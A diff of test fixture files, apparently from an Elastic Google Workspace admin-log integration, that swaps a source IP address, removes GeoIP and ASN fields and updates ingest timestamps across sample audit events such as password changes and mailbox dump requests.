"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_FIRST_NAME", "id": "1", @@ -3004,7 +2392,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3028,35 +2416,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301290900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}", + "ingested": "2021-12-09T13:38:57.005019200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}", "provider": "admin", "action": "GMAIL_RESET_USER", "id": "1", @@ -3093,7 +2463,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3117,35 +2487,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301292600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.005024600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LAST_NAME", "id": "1", @@ -3182,7 +2534,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3206,35 +2558,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301294300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:57.005029900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "MAIL_ROUTING_DESTINATION_ADDED", "id": "1", @@ -3271,7 +2605,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3295,35 +2629,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301296Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.005038500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "MAIL_ROUTING_DESTINATION_REMOVED", "id": "1", @@ -3360,7 +2676,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3384,35 +2700,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301297700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", + "ingested": "2021-12-09T13:38:57.005044100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "provider": "admin", "action": "ADD_NICKNAME", "id": "1", @@ -3449,7 +2747,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3473,35 +2771,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301299300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", + "ingested": "2021-12-09T13:38:57.005049600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "provider": "admin", "action": "REMOVE_NICKNAME", "id": "1", @@ -3538,7 +2818,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3562,35 +2842,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301301Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005054900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD", "id": "1", @@ -3627,7 +2889,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3651,35 +2913,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301302700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:57.005060200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_ON_NEXT_LOGIN", "id": "1", @@ -3715,7 +2959,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3734,35 +2978,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301304400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}", + "ingested": "2021-12-09T13:38:57.005065600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}", "provider": "admin", "action": "DOWNLOAD_PENDING_INVITES_LIST", "id": "1", @@ -3793,7 +3019,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3817,35 +3043,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301306100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005069500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_RECOVERY_EMAIL", "id": "1", @@ -3882,7 +3090,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3906,35 +3114,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301307800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005074500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_RECOVERY_PHONE", "id": "1", @@ -3971,7 +3161,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -3995,35 +3185,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301309600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005079300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REQUEST_ACCOUNT_INFO", "id": "1", @@ -4060,7 +3232,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4084,35 +3256,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301311300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", + "ingested": "2021-12-09T13:38:57.005084800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "provider": "admin", "action": "REQUEST_MAILBOX_DUMP", "id": "1", @@ -4148,7 +3302,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4172,35 +3326,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301313Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.005088500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RESEND_USER_INVITE", "id": "1", @@ -4232,7 +3368,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4256,35 +3392,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, 